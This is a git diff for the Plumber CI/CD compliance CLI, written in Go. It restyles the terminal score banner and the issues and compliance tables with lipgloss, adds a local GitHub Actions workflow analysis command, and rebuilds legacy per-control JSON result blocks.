// The whole badge (borders + letter) is rendered in bold, using the letter's
// tier color so it reads as a single coherent visual token.
-func scoreLetterBadgeLines(letter string) []string {
- gc := scoreLetterColor(letter) + colorBold
- // 7 interior columns keep the letter nicely framed (3 spaces on each side).
- top := fmt.Sprintf("%sβββββββββ%s", gc, colorReset)
- mid := fmt.Sprintf("%sβ β%s", gc, colorReset)
- let := fmt.Sprintf("%sβ %s β%s", gc, letter, colorReset)
- bot := fmt.Sprintf("%sβββββββββ%s", gc, colorReset)
- return []string{top, mid, let, mid, bot}
-}
-
+// printSummaryScoreBanner renders the Plumber letter score in a
+// modernised two-column layout: a large grade badge on the left and a
+// side panel on the right with points, progress bar, meaning text,
+// and severity chips, followed by any Critical malus warning.
func printSummaryScoreBanner(score *control.PlumberScoreResult, scoreMode bool) {
if score == nil || !scoreMode {
return
}
- const indent = " "
- const gap = " "
- badge := scoreLetterBadgeLines(score.Score)
+ letterColor := scoreLetterLipglossColor(score.Score)
+
+	// Block-letter ASCII badge — six lines tall, matches the project
+	// banner lettering style.
+ badge := scoreLetterAsciiArt(score.Score)
+
+ letterStyle := lipgloss.NewStyle().Foreground(letterColor).Bold(true)
+ pointsLine := letterStyle.Render(fmt.Sprintf("%.0f / 100 pts", score.FinalPoints))
+ bar := scoreBar(score.FinalPoints, 28)
+ meaning := ""
+ if m := control.ScoreLetterMeaning(score.Score); m != "" {
+ meaning = styleMuted.Render(m)
+ }
+ chips := fmt.Sprintf("%s %s %s %s",
+ severityChip("critical", "Critical", score.Counts.Critical),
+ severityChip("high", "High", score.Counts.High),
+ severityChip("medium", "Medium", score.Counts.Medium),
+ severityChip("low", "Low", score.Counts.Low))
+
+ // Six-line side panel matching the block-letter badge height:
+ // blank line, points, bar, meaning, blank, chips.
+ side := lipgloss.JoinVertical(lipgloss.Left,
+ "",
+ pointsLine,
+ bar,
+ meaning,
+ "",
+ chips,
+ )
+ // lipgloss.JoinHorizontal vertically centers the two blocks; the
+ // side panel gets a small left gutter.
+ body := lipgloss.JoinHorizontal(lipgloss.Center,
+ badge,
+ lipgloss.NewStyle().PaddingLeft(2).Render(side),
+ )
+
+ sep := styleRule.Render(strings.Repeat("β", hrWidth))
- fmt.Printf(" %sβββ Plumber Score βββββββββββββββββββββββββββββββββββββ%s\n", colorCyan, colorReset)
+ fmt.Println()
+ fmt.Println(" " + sep)
+ fmt.Println(" " + styleMuted.Render("Plumber Score"))
+ fmt.Println()
+ fmt.Println(indentBlock(body, " "))
- gc := scoreLetterColor(score.Score)
- if meaning := control.ScoreLetterMeaning(score.Score); meaning != "" {
- fmt.Printf(" %s%s%s%s %s%s%s\n\n", colorBold, gc, score.Score, colorReset, colorDim, meaning, colorReset)
- } else {
+ if score.CriticalMalusApplied {
fmt.Println()
- }
- scoreLine := fmt.Sprintf("%s%s%.1f / 100 pts%s", colorBold, gc, score.FinalPoints, colorReset)
- bar := scoreBar(score.FinalPoints, 30)
- counts := fmt.Sprintf("%s%s Critical %s %-3d %s%s High %s %-3d %s Medium %s %-3d %s Low %s %-3d",
- colorBgRed, colorWhite, colorReset, score.Counts.Critical,
- colorBgYellow, colorBlack, colorReset, score.Counts.High,
- colorCyan, colorReset, score.Counts.Medium,
- colorBlue, colorReset, score.Counts.Low)
-
- // Side panel rows align with the 3 middle lines of the badge so the
- // badge reads as the primary visual and the metrics sit beside it.
- side := []string{"", scoreLine, bar, counts, ""}
- for i, b := range badge {
- if side[i] == "" {
- fmt.Printf("%s%s\n", indent, b)
- } else {
- fmt.Printf("%s%s%s%s\n", indent, b, gap, side[i])
- }
+ fmt.Printf(" %s %s\n",
+ styleFail.Render("β² Critical malus applied"),
+ styleMuted.Render(fmt.Sprintf("(final points capped at %.0f while any Critical remains)", score.CriticalMalusMax)))
}
- if score.CriticalMalusApplied {
- fmt.Printf("\n%s%sβ Critical malus: final points capped at %.0f%s\n", indent, colorRed, score.CriticalMalusMax, colorReset)
- }
+ fmt.Println()
+ fmt.Println(" " + sep)
+ fmt.Println()
+}
- fmt.Printf("\n %sβββββββββββββββββββββββββββββββββββββββββββββββββββββββ%s\n\n", colorDim, colorReset)
+// severityChip renders a single severity count as an emoji + label +
+// colored count, used by the modern score banner.
+func severityChip(sev, label string, n int) string {
+ countStyle := lipgloss.NewStyle().Foreground(severityColor(sev)).Bold(true)
+ return severityIcon(sev) + " " + styleMuted.Render(label) + " " + countStyle.Render(fmt.Sprintf("%d", n))
}
func printIssuesTable(controls []controlSummary) {
@@ -1768,212 +1340,137 @@ func printIssuesTable(controls []controlSummary) {
}
}
- fmt.Printf(" %sControls%s\n", colorBold, colorReset)
+ fmt.Printf(" %s\n", styleTitle.Render("Controls"))
if len(rows) == 0 {
- fmt.Printf(" %s(none with open issues)%s\n", colorDim, colorReset)
+ fmt.Printf(" %s\n", styleDim.Render("(none with open issues)"))
return
}
sortControlSummariesForIssuesTable(rows)
- controlWidth := 44
- for _, ctrl := range rows {
- needed := len(ctrl.name) + 2
- if needed > controlWidth {
- controlWidth = needed
- }
- }
- codesWidth := 22
- for _, ctrl := range rows {
- codesStr := strings.Join(ctrl.codes, ", ")
- needed := len(codesStr) + 2
- if needed > codesWidth {
- codesWidth = needed
- }
- }
- sevWidth := 12
- issuesWidth := 6
-
- // Top border
- fmt.Printf(" %sβ%sβ€%sβ€%sβ€%sβ%s\n",
- colorCyan,
- strings.Repeat("β", controlWidth),
- strings.Repeat("β", codesWidth),
- strings.Repeat("β", sevWidth),
- strings.Repeat("β", issuesWidth),
- colorReset)
-
- // Header row
- fmt.Printf(" %sβ%s %-*s %sβ%s %-*s %sβ%s %-*s %sβ%s %*s %sβ%s\n",
- colorCyan, colorReset,
- controlWidth-2, "Control",
- colorCyan, colorReset,
- codesWidth-2, "Codes",
- colorCyan, colorReset,
- sevWidth-2, "Severity",
- colorCyan, colorReset,
- issuesWidth-2, "#",
- colorCyan, colorReset)
-
- // Header separator
- fmt.Printf(" %sβ%sβΌ%sβΌ%sβΌ%sβ’%s\n",
- colorCyan,
- strings.Repeat("β", controlWidth),
- strings.Repeat("β", codesWidth),
- strings.Repeat("β", sevWidth),
- strings.Repeat("β", issuesWidth),
- colorReset)
+ tbl := table.New().
+ Border(lipgloss.RoundedBorder()).
+ BorderStyle(styleAccent).
+ Headers("Control", "Codes", "Severity", "#").
+ StyleFunc(func(row, col int) lipgloss.Style {
+ if row == table.HeaderRow {
+ return styleHeader
+ }
+ if col == 3 && row >= 0 && row < len(rows) && rows[row].issues > 0 {
+ return styleCell.Inherit(styleError)
+ }
+ return styleCell
+ })
for _, ctrl := range rows {
issueStr := "-"
if !ctrl.skipped {
issueStr = fmt.Sprintf("%d", ctrl.issues)
}
- issueColor := colorReset
- if ctrl.issues > 0 {
- issueColor = colorRed
- }
-
codesStr := strings.Join(ctrl.codes, ", ")
if ctrl.skipped {
codesStr = "-"
}
-
- sevLabel := highestSeverityLabel(ctrl.bySeverity, sevWidth-2)
+ sevLabel := highestSeverityLabel(ctrl.bySeverity, 10)
if ctrl.skipped || ctrl.bySeverity.Critical+ctrl.bySeverity.High+ctrl.bySeverity.Medium+ctrl.bySeverity.Low == 0 {
- sevLabel = highestSeverityLabel(control.SeverityCounts{}, sevWidth-2)
+ sevLabel = highestSeverityLabel(control.SeverityCounts{}, 10)
}
+ tbl.Row(ctrl.name, codesStr, sevLabel, issueStr)
+ }
+
+ fmt.Println(indentBlock(tbl.String(), " "))
+ fmt.Printf(" %s\n", styleDim.Render("β³ docs: https://getplumber.io/docs/use-plumber/issues/"))
+}
- fmt.Printf(" %sβ%s %-*s %sβ%s %-*s %sβ%s %s %sβ%s %s%*s%s %sβ%s\n",
- colorCyan, colorReset,
- controlWidth-2, ctrl.name,
- colorCyan, colorReset,
- codesWidth-2, codesStr,
- colorCyan, colorReset,
- sevLabel,
- colorCyan, colorReset,
- issueColor, issuesWidth-2, issueStr, colorReset,
- colorCyan, colorReset)
- }
-
- // Bottom border
- fmt.Printf(" %sβ%sβ§%sβ§%sβ§%sβ%s\n",
- colorCyan,
- strings.Repeat("β", controlWidth),
- strings.Repeat("β", codesWidth),
- strings.Repeat("β", sevWidth),
- strings.Repeat("β", issuesWidth),
- colorReset)
-
- fmt.Printf(" %sβ³ docs: https://getplumber.io/docs/use-plumber/issues/%s\n", colorDim, colorReset)
+// indentBlock prefixes every line of s with prefix. Used because
+// lipgloss tables render flush-left and we want a little left margin.
+func indentBlock(s, prefix string) string {
+ lines := strings.Split(strings.TrimRight(s, "\n"), "\n")
+ for i, l := range lines {
+ lines[i] = prefix + l
+ }
+ return strings.Join(lines, "\n")
}
func printComplianceTable(controls []controlSummary, overallCompliance, threshold float64) {
- fmt.Printf(" %sCompliance%s\n", colorBold, colorReset)
+ fmt.Printf(" %s\n", styleTitle.Render("Compliance"))
sorted := append([]controlSummary(nil), controls...)
sortControlSummariesForComplianceTable(sorted)
- // Calculate column widths dynamically based on longest control name
- controlWidth := 52 // minimum width
- for _, ctrl := range sorted {
- needed := len(ctrl.name) + 2 // +2 for padding
- if needed > controlWidth {
- controlWidth = needed
- }
- }
- complianceWidth := 12
- statusWidth := 10
-
- // Top border
- fmt.Printf(" %sβ%sβ€%sβ€%sβ%s\n",
- colorCyan,
- strings.Repeat("β", controlWidth),
- strings.Repeat("β", complianceWidth),
- strings.Repeat("β", statusWidth),
- colorReset)
-
- // Header row
- fmt.Printf(" %sβ%s %-*s %sβ%s %*s %sβ%s %*s %sβ%s\n",
- colorCyan, colorReset,
- controlWidth-2, "Control",
- colorCyan, colorReset,
- complianceWidth-2, "Compliance",
- colorCyan, colorReset,
- statusWidth-2, "Status",
- colorCyan, colorReset)
-
- // Header separator
- fmt.Printf(" %sβ%sβΌ%sβΌ%sβ’%s\n",
- colorCyan,
- strings.Repeat("β", controlWidth),
- strings.Repeat("β", complianceWidth),
- strings.Repeat("β", statusWidth),
- colorReset)
-
- // Data rows
+ // Total line rendered as an extra row at the bottom. We remember its
+ // index so StyleFunc can make it bold.
+ type rowKind int
+ const (
+ rowControl rowKind = iota
+ rowTotal
+ )
+ type tblRow struct {
+ kind rowKind
+ name string
+ compStr string
+ status string
+ compOK bool
+ }
+
+ var rows []tblRow
for _, ctrl := range sorted {
- compStr := "-"
- statusStr := "-"
- compColor := colorReset
- statusColor := colorDim
-
+ r := tblRow{kind: rowControl, name: ctrl.name, compStr: "-", status: "-"}
if !ctrl.skipped {
- compStr = fmt.Sprintf("%.1f%%", ctrl.compliance)
- if ctrl.compliance >= 100 {
- compColor = colorGreen
- statusColor = colorGreen
- statusStr = "β"
+ r.compStr = fmt.Sprintf("%.1f%%", ctrl.compliance)
+ r.compOK = ctrl.compliance >= 100
+ if r.compOK {
+ r.status = "π’"
} else {
- compColor = colorRed
- statusColor = colorRed
- statusStr = "β"
+ r.status = "π΄"
}
}
+ rows = append(rows, r)
+ }
+ totalRow := tblRow{
+ kind: rowTotal,
+ name: fmt.Sprintf("Total (required: %.0f%%)", threshold),
+ compStr: fmt.Sprintf("%.1f%%", overallCompliance),
+ compOK: overallCompliance >= threshold,
+ }
+ if totalRow.compOK {
+ totalRow.status = "π’"
+ } else {
+ totalRow.status = "π΄"
+ }
+ rows = append(rows, totalRow)
+
+ tbl := table.New().
+ Border(lipgloss.RoundedBorder()).
+ BorderStyle(styleAccent).
+ Headers("Control", "Compliance", "Status").
+ StyleFunc(func(row, col int) lipgloss.Style {
+ if row == table.HeaderRow {
+ return styleHeader
+ }
+ if row < 0 || row >= len(rows) {
+ return styleCell
+ }
+ r := rows[row]
+ style := styleCell
+ if r.kind == rowTotal {
+ style = style.Bold(true)
+ }
+ if col == 1 || col == 2 {
+ if r.compStr == "-" {
+ return style.Faint(true)
+ }
+ if r.compOK {
+ return style.Inherit(styleSuccess)
+ }
+ return style.Inherit(styleError)
+ }
+ return style
+ })
+
+ for _, r := range rows {
+ tbl.Row(r.name, r.compStr, r.status)
+ }
- fmt.Printf(" %sβ%s %-*s %sβ%s %s%*s%s %sβ%s %s%*s%s %sβ%s\n",
- colorCyan, colorReset,
- controlWidth-2, ctrl.name,
- colorCyan, colorReset,
- compColor, complianceWidth-2, compStr, colorReset,
- colorCyan, colorReset,
- statusColor, statusWidth-2, statusStr, colorReset,
- colorCyan, colorReset)
- }
-
- // Separator before total
- fmt.Printf(" %sβ%sβΌ%sβΌ%sβ’%s\n",
- colorCyan,
- strings.Repeat("β", controlWidth),
- strings.Repeat("β", complianceWidth),
- strings.Repeat("β", statusWidth),
- colorReset)
-
- // Total row
- totalCompStr := fmt.Sprintf("%.1f%%", overallCompliance)
- totalStatus := "β"
- totalCompColor := colorGreen
- totalStatusColor := colorGreen
- if overallCompliance < threshold {
- totalStatus = "β"
- totalCompColor = colorRed
- totalStatusColor = colorRed
- }
-
- fmt.Printf(" %sβ%s %s%-*s%s %sβ%s %s%*s%s %sβ%s %s%*s%s %sβ%s\n",
- colorCyan, colorReset,
- colorBold, controlWidth-2, fmt.Sprintf("Total (required: %.0f%%)", threshold), colorReset,
- colorCyan, colorReset,
- totalCompColor, complianceWidth-2, totalCompStr, colorReset,
- colorCyan, colorReset,
- totalStatusColor, statusWidth-2, totalStatus, colorReset,
- colorCyan, colorReset)
-
- // Bottom border
- fmt.Printf(" %sβ%sβ§%sβ§%sβ%s\n",
- colorCyan,
- strings.Repeat("β", controlWidth),
- strings.Repeat("β", complianceWidth),
- strings.Repeat("β", statusWidth),
- colorReset)
+ fmt.Println(indentBlock(tbl.String(), " "))
}
diff --git a/cmd/analyze_github.go b/cmd/analyze_github.go
new file mode 100644
index 0000000..fba2a12
--- /dev/null
+++ b/cmd/analyze_github.go
@@ -0,0 +1,198 @@
+package cmd
+
+import (
+ "fmt"
+ "os"
+ "sort"
+ "strings"
+
+ "github.com/getplumber/plumber/configuration"
+ "github.com/getplumber/plumber/control"
+ opaengine "github.com/getplumber/plumber/internal/engine/opa"
+ "github.com/getplumber/plumber/utils"
+ "github.com/sirupsen/logrus"
+ "github.com/spf13/cobra"
+)
+
+// runGitHubAnalyze handles `plumber analyze` for GitHub-hosted projects.
+// Local-only MVP: walks .github/workflows/*.{yml,yaml} under the detected
+// git repo root, evaluates the embedded Rego policies, and prints /
+// writes the resulting findings. No GitHub API call, no token required.
+//
+// Returns an error (exit code 1) when at least one finding is reported,
+// so the command can gate CI pipelines without any threshold flag.
+func runGitHubAnalyze(cmd *cobra.Command, info *utils.GitRemoteInfo) error {
+ fmt.Fprintf(os.Stderr, "Auto-detected GitHub project: %s\n", info.ProjectPath)
+
+ plumberConfig, configPath, configWarnings, err := configuration.LoadPlumberConfig(configFile)
+ if err != nil {
+ if strings.Contains(err.Error(), "config file not found") {
+ return fmt.Errorf("configuration file not found: %w. Create one with `plumber config generate` or `plumber config init`", err)
+ }
+ return fmt.Errorf("configuration error: %w", err)
+ }
+ if len(configWarnings) > 0 {
+ fmt.Fprintf(os.Stderr, "Configuration validation warnings:\n")
+ for _, w := range configWarnings {
+ fmt.Fprintf(os.Stderr, " - %s\n", w)
+ }
+ if failWarnings {
+ return fmt.Errorf("configuration has %d warning(s) and --fail-warnings is set", len(configWarnings))
+ }
+ }
+ fmt.Fprintf(os.Stderr, "Using configuration: %s\n", configPath)
+
+ if printOutput {
+ printBanner()
+ }
+
+ conf := configuration.NewDefaultConfiguration()
+ conf.ProjectPath = info.ProjectPath
+ conf.GitRepoRoot = info.RepoRoot
+ conf.Branch = defaultBranch
+ conf.PlumberConfig = plumberConfig
+ if verbose {
+ conf.LogLevel = logrus.DebugLevel
+ }
+
+ fmt.Fprintf(os.Stderr, "Scanning workflows under: %s\n", info.RepoRoot)
+
+ // Progress spinner β mirrors the GitLab path. Only installed
+ // when we are printing to stdout and not running verbose (the
+ // spinner races with log lines in verbose mode).
+ sp := newSpinner()
+ if printOutput && !verbose {
+ conf.ProgressFunc = func(step, total int, message string) {
+ sp.Update(step, total, message)
+ }
+ sp.InstallLogHook()
+ sp.Start()
+ }
+
+ result, err := control.RunGitHubAnalysis(conf)
+ sp.Stop()
+ if err != nil {
+ return fmt.Errorf("analysis failed: %w", err)
+ }
+
+ // Compute the Plumber letter score on demand. The pipeline
+	// (AggregateSeverityCounts → ComputePlumberScore) is the same one
+ // used on GitLab, so the letter is definition-compatible across
+ // providers.
+ scoreMode := showScore || showScorePoint
+ var scoreResult *control.PlumberScoreResult
+ if scoreMode {
+ counts := control.AggregateSeverityCounts(result)
+ s := control.ComputePlumberScore(counts)
+ scoreResult = &s
+ }
+
+ // Binary compliance on the GitHub path for now: pass when there is no
+ // finding, fail otherwise. A per-rule compliance model matching the
+ // GitLab controls (each control averages its own compliance) will come
+ // alongside the CLI threshold flag work.
+ compliance := 100.0
+ if len(result.Findings) > 0 {
+ compliance = 0.0
+ }
+
+ if outputFile != "" {
+ if err := writeJSONToFile(result, conf.PlumberConfig, threshold, compliance, outputFile, scoreResult, scoreMode); err != nil {
+ return err
+ }
+ fmt.Fprintf(os.Stderr, "Results written to: %s\n", outputFile)
+ }
+
+ if printOutput {
+ printGitHubFindings(result, compliance)
+ printSummaryScoreBanner(scoreResult, scoreMode)
+ if showScorePoint {
+ printScoreBreakdown(scoreResult)
+ }
+ }
+
+ if len(result.Findings) > 0 {
+ return &ComplianceError{Compliance: compliance, Threshold: threshold}
+ }
+ return nil
+}
+
+// printGitHubFindings writes the GitHub analyze output in the same
+// visual style as the GitLab path: project header, a per-rule detail
+// block for each rule that produced findings, a controls summary
+// table, a compliance table with a total line. Detail rendering is
+// delegated to the shared renderFindingGroups so the visual contract
+// is identical across providers.
+func printGitHubFindings(result *control.AnalysisResult, overallCompliance float64) {
+ fmt.Printf("\n%s %s\n\n", styleTitle.Render("Project:"), result.ProjectPath)
+
+ if !result.CiValid {
+ fmt.Printf(" %s\n", styleDim.Render("No GitHub Actions workflows discovered."))
+ return
+ }
+
+ renderFindingGroups(findingGroupsFromRegoFindings(result.Findings))
+
+ summaries := summariesFromFindings(result.Findings)
+ if len(summaries) == 0 {
+ fmt.Printf(" %s\n\n", styleSuccess.Render("β No findings. All policies pass."))
+ return
+ }
+
+ printIssuesTable(summaries)
+ fmt.Println()
+ printComplianceTable(summaries, overallCompliance, 100)
+}
+
+// summariesFromFindings projects the Rego engine's flat list of
+// findings onto the same []controlSummary shape the GitLab path builds
+// from its legacy Go controls. Findings are grouped by the ControlName
+// advertised in the issue-code registry; each summary reports one
+// entry per policy that produced at least one finding, with a
+// per-policy compliance of 0 (binary model on the GitHub side).
+func summariesFromFindings(findings []opaengine.Finding) []controlSummary {
+ byControl := map[string]*controlSummary{}
+ for _, f := range findings {
+ info := control.LookupCode(control.ErrorCode(f.Code))
+ name := f.Code
+ if info != nil && info.ControlName != "" {
+ name = info.ControlName
+ }
+ sum, ok := byControl[name]
+ if !ok {
+ sum = &controlSummary{name: name, compliance: 0}
+ byControl[name] = sum
+ }
+ sum.issues++
+ if !containsString(sum.codes, f.Code) {
+ sum.codes = append(sum.codes, f.Code)
+ }
+ switch control.SeverityForCode(control.ErrorCode(f.Code)) {
+ case control.SeverityCritical:
+ sum.bySeverity.Critical++
+ case control.SeverityHigh:
+ sum.bySeverity.High++
+ case control.SeverityMedium:
+ sum.bySeverity.Medium++
+ case control.SeverityLow:
+ sum.bySeverity.Low++
+ }
+ }
+
+ out := make([]controlSummary, 0, len(byControl))
+ for _, s := range byControl {
+ sort.Strings(s.codes)
+ out = append(out, *s)
+ }
+ sort.Slice(out, func(i, j int) bool { return out[i].name < out[j].name })
+ return out
+}
+
+func containsString(s []string, v string) bool {
+ for _, e := range s {
+ if e == v {
+ return true
+ }
+ }
+ return false
+}
diff --git a/cmd/legacy_json.go b/cmd/legacy_json.go
new file mode 100644
index 0000000..d51e283
--- /dev/null
+++ b/cmd/legacy_json.go
@@ -0,0 +1,876 @@
+package cmd
+
+import (
+ "sort"
+ "strings"
+
+ "github.com/getplumber/plumber/collector"
+ "github.com/getplumber/plumber/configuration"
+ "github.com/getplumber/plumber/control"
+ "github.com/getplumber/plumber/gitlab"
+ opaengine "github.com/getplumber/plumber/internal/engine/opa"
+ "github.com/getplumber/plumber/utils"
+)
+
+// _minAccessLevelGitlab returns the smallest accessLevel found in
+// the list β the effective minimum required level for push or merge
+// in a GitLab branch protection rule. Returns 0 when the list is
+// empty (no rule, "no one" can do it).
+func _minAccessLevelGitlab(levels []gitlab.BranchProtectionAccessLevel) int {
+ min := 0
+ for i, l := range levels {
+ if i == 0 || l.AccessLevel < min {
+ min = l.AccessLevel
+ }
+ }
+ return min
+}
+
+// legacyResultsByName builds the per-control `*Result` JSON blocks
+// that the v0.2.x analyzer emitted alongside the bare findings list.
+// External consumers (CI gates, dashboards, MR comment generators)
+// learned to parse those blocks: each control's issues list, its
+// `metrics` object, and the binary `compliance` flag travel together
+// under a stable JSON key. The Rego port had collapsed them into a
+// single `findings` array, so we reconstruct them here from the IR
+// data still attached to AnalysisResult plus the bucketed Rego
+// findings.
+//
+// Returned map keys match the legacy JSON field names
+// (imageForbiddenTagsResult, imageAuthorizedSourcesResult, …) so the
+// caller can splice them straight into the output struct.
+func legacyResultsByName(result *control.AnalysisResult, pc *configuration.PlumberConfig) map[string]any {
+ if result == nil || pc == nil {
+ return nil
+ }
+ out := map[string]any{}
+ findingsByControl := control.FindingsByControl(result.Findings)
+
+ for _, e := range control.GitLabControls(pc) {
+ fs := findingsByControl[e.ControlName]
+ key, block := buildLegacyResult(e, result, pc, fs)
+ if key == "" {
+ continue
+ }
+ out[key] = block
+ }
+ return out
+}
+
+// buildLegacyResult routes a control entry to its legacy JSON
+// builder and returns the (jsonKey, block) pair.
+func buildLegacyResult(e control.ControlEntry, result *control.AnalysisResult, pc *configuration.PlumberConfig, findings []opaengine.Finding) (string, any) {
+ compliance := 100.0
+ if !e.Skipped && len(findings) > 0 {
+ compliance = 0
+ }
+ common := legacyCommon{
+ Compliance: compliance,
+ CiValid: result.CiValid,
+ CiMissing: result.CiMissing,
+ Skipped: e.Skipped,
+ }
+
+ switch e.ControlName {
+ case "containerImageMustNotUseForbiddenTags":
+ return "imageForbiddenTagsResult", buildImageForbiddenTagsBlock(common, result, pc, findings)
+ case "containerImageMustComeFromAuthorizedSources":
+ return "imageAuthorizedSourcesResult", buildImageAuthorizedSourcesBlock(common, result, findings)
+ case "branchMustBeProtected":
+ return "branchProtectionResult", buildBranchProtectionBlock(common, result, pc, findings)
+ case "pipelineMustNotIncludeHardcodedJobs":
+ return "hardcodedJobsResult", buildHardcodedJobsBlock(common, result, findings)
+ case "includesMustBeUpToDate":
+ return "outdatedIncludesResult", buildOutdatedIncludesBlock(common, result, findings)
+	// (jobNameKey is dropped for the outdated builder — the legacy
+	// shape replaces `job` with `gitlabIncludeLocation`.)
+ case "includesMustNotUseForbiddenVersions":
+ return "forbiddenVersionsIncludesResult", buildForbiddenVersionsBlock(common, result, findings)
+ case "pipelineMustIncludeComponent":
+ return "requiredComponentsResult", buildRequirementGroupsBlock(common, pc.Controls.PipelineMustIncludeComponent, result, findings)
+ case "pipelineMustIncludeTemplate":
+ return "requiredTemplatesResult", buildRequirementGroupsTemplateBlock(common, pc.Controls.PipelineMustIncludeTemplate, result, findings)
+ case "pipelineMustNotEnableDebugTrace":
+ return "debugTraceResult", buildDebugTraceBlock(common, result, findings)
+ case "pipelineMustNotUseUnsafeVariableExpansion":
+ return "variableInjectionResult", buildVariableInjectionBlock(common, result, findings)
+ case "securityJobsMustNotBeWeakened":
+ return "securityJobsWeakenedResult", buildSecurityJobsBlock(common, result, pc, findings)
+ case "pipelineMustNotExecuteUnverifiedScripts":
+ return "unverifiedScriptsResult", buildUnverifiedScriptsBlock(common, result, findings)
+ case "pipelineMustNotOverrideJobVariables":
+ return "jobVariablesOverrideResult", buildJobVariablesOverrideBlock(common, result, findings)
+ case "pipelineMustNotUseDockerInDocker":
+ return "dockerInDockerResult", buildDockerInDockerBlock(common, result, findings)
+ }
+ return "", nil
+}
+
+// legacyCommon carries the bookkeeping fields shared by every
+// `*Result` block: compliance, ciValid, ciMissing, skipped.
+type legacyCommon struct {
+ Compliance float64
+ CiValid bool
+ CiMissing bool
+ Skipped bool
+}
+
+// projectFinding strips the verbose Rego-side fields (severity,
+// message, file, line) so the returned issue keeps only what the
+// legacy format documented: code, docUrl, plus whatever structured
+// payload the rule emitted (link/tag/variableName/…).
+func projectFinding(f opaengine.Finding, jobNameKey string) map[string]any {
+ out := map[string]any{
+ "code": f.Code,
+ "docUrl": "https://getplumber.io/docs/use-plumber/issues/" + f.Code,
+ }
+ if f.Job != "" && jobNameKey != "" {
+ out[jobNameKey] = f.Job
+ }
+ for k, v := range f.Data {
+ if k == "docUrl" {
+ continue
+ }
+ out[k] = v
+ }
+ return out
+}
+
+func projectFindings(findings []opaengine.Finding, jobNameKey string) []map[string]any {
+ out := make([]map[string]any, 0, len(findings))
+ for _, f := range findings {
+ out = append(out, projectFinding(f, jobNameKey))
+ }
+ return out
+}
+
+// _sortedFindings returns findings in a stable total order so legacy JSON
+// issues[] do not flip between runs when Job matches (e.g. two codes on the
+// same job). Primary key is Job, then Code, File, Line, Message — aligned
+// with the OPA engine aggregate sort.
+func _sortedFindings(findings []opaengine.Finding) []opaengine.Finding {
+ out := make([]opaengine.Finding, len(findings))
+ copy(out, findings)
+ sort.SliceStable(out, func(i, j int) bool {
+ a, b := out[i], out[j]
+ switch {
+ case a.Job != b.Job:
+ return a.Job < b.Job
+ case a.Code != b.Code:
+ return a.Code < b.Code
+ case a.File != b.File:
+ return a.File < b.File
+ case a.Line != b.Line:
+ return a.Line < b.Line
+ default:
+ return a.Message < b.Message
+ }
+ })
+ return out
+}
+
+// _branchProtectionEntryForName returns the first GitLab protection rule
+// whose pattern matches the branch name, consistent with the
+// protectionByBranch indexing in buildBranchProtectionBlock.
+func _branchProtectionEntryForName(data *collector.GitlabProtectionAnalysisData, branchName string) *gitlab.BranchProtection {
+ if data == nil || branchName == "" {
+ return nil
+ }
+ for i := range data.BranchProtections {
+ p := &data.BranchProtections[i]
+ if _matchesAnyGlob(branchName, []string{p.ProtectionPattern}) {
+ return p
+ }
+ }
+ return nil
+}
+
+// enrichBranchProtection505IssueMaps restores the v0.2.x issue shape for
+// ISSUE-505: *Display flags and codeOwnerApprovalRequired from the
+// protection API (Rego alone cannot express the legacy display semantics).
+func enrichBranchProtection505IssueMaps(issues []map[string]any, result *control.AnalysisResult, pc *configuration.PlumberConfig) {
+ var cfg *configuration.BranchProtectionControlConfig
+ if pc != nil {
+ cfg = pc.Controls.BranchMustBeProtected
+ }
+ allowForcePushPolicy := false
+ if cfg != nil && cfg.AllowForcePush != nil {
+ allowForcePushPolicy = *cfg.AllowForcePush
+ }
+ codeOwnerPolicy := false
+ if cfg != nil && cfg.CodeOwnerApprovalRequired != nil {
+ codeOwnerPolicy = *cfg.CodeOwnerApprovalRequired
+ }
+ minMergePolicy := 0
+ if cfg != nil && cfg.MinMergeAccessLevel != nil {
+ minMergePolicy = *cfg.MinMergeAccessLevel
+ }
+ minPushPolicy := 0
+ if cfg != nil && cfg.MinPushAccessLevel != nil {
+ minPushPolicy = *cfg.MinPushAccessLevel
+ }
+ for _, issue := range issues {
+ code, _ := issue["code"].(string)
+ if code != string(control.CodeBranchNonCompliant) {
+ continue
+ }
+ branchName, _ := issue["branchName"].(string)
+ if branchName == "" {
+ if j, ok := issue["job"].(string); ok {
+ branchName = j
+ }
+ }
+ if branchName == "" {
+ continue
+ }
+ if result == nil || result.ProtectionData == nil {
+ continue
+ }
+ p := _branchProtectionEntryForName(result.ProtectionData, branchName)
+ if p == nil {
+ continue
+ }
+ branchAllow := p.AllowForcePush
+ branchCodeOwner := p.CodeOwnerApprovalRequired
+ branchMinMerge := _minAccessLevelGitlab(p.MergeAccessLevels)
+ branchMinPush := _minAccessLevelGitlab(p.PushAccessLevels)
+ issue["codeOwnerApprovalRequired"] = branchCodeOwner
+ // controlGitlabProtectionBranchProtectionNotCompliant.go display bits
+ if !allowForcePushPolicy && branchAllow {
+ issue["allowForcePushDisplay"] = true
+ } else {
+ delete(issue, "allowForcePushDisplay")
+ }
+ if codeOwnerPolicy && !branchCodeOwner {
+ issue["codeOwnerApprovalRequiredDisplay"] = true
+ } else {
+ delete(issue, "codeOwnerApprovalRequiredDisplay")
+ }
+ if branchMinMerge != 0 && (minMergePolicy == 0 || minMergePolicy > branchMinMerge) {
+ issue["minMergeAccessLevelDisplay"] = true
+ } else {
+ delete(issue, "minMergeAccessLevelDisplay")
+ }
+ if branchMinPush != 0 && (minPushPolicy == 0 || minPushPolicy > branchMinPush) {
+ issue["minPushAccessLevelDisplay"] = true
+ } else {
+ delete(issue, "minPushAccessLevelDisplay")
+ }
+ }
+}
+
+func _originByIncludeSource(data *collector.GitlabPipelineOriginData, source string) *collector.GitlabPipelineOriginDataFull {
+ if data == nil || source == "" {
+ return nil
+ }
+ cleanedWant := utils.CleanOriginPath(source)
+ for i := range data.Origins {
+ o := &data.Origins[i]
+ loc := o.GitlabIncludeOrigin.Location
+ if loc == "" {
+ loc = o.GitlabComponent.ComponentIncludePath
+ }
+ if loc == source || (loc != "" && utils.CleanOriginPath(loc) == cleanedWant) {
+ return o
+ }
+ }
+ return nil
+}
+
+// enrichForbiddenVersion404IssueMaps restores the v0.1.x
+// GitlabPipelineIncludesForbiddenVersionIssue fields from
+// collector data (Rego only emits a slim finding).
+func enrichForbiddenVersion404IssueMaps(issues []map[string]any, result *control.AnalysisResult) {
+ if result == nil || result.PipelineOriginData == nil {
+ return
+ }
+ for _, issue := range issues {
+ code, _ := issue["code"].(string)
+ if code != string(control.CodeIncludeForbiddenVersion) {
+ continue
+ }
+ src, _ := issue["job"].(string)
+ if src == "" {
+ continue
+ }
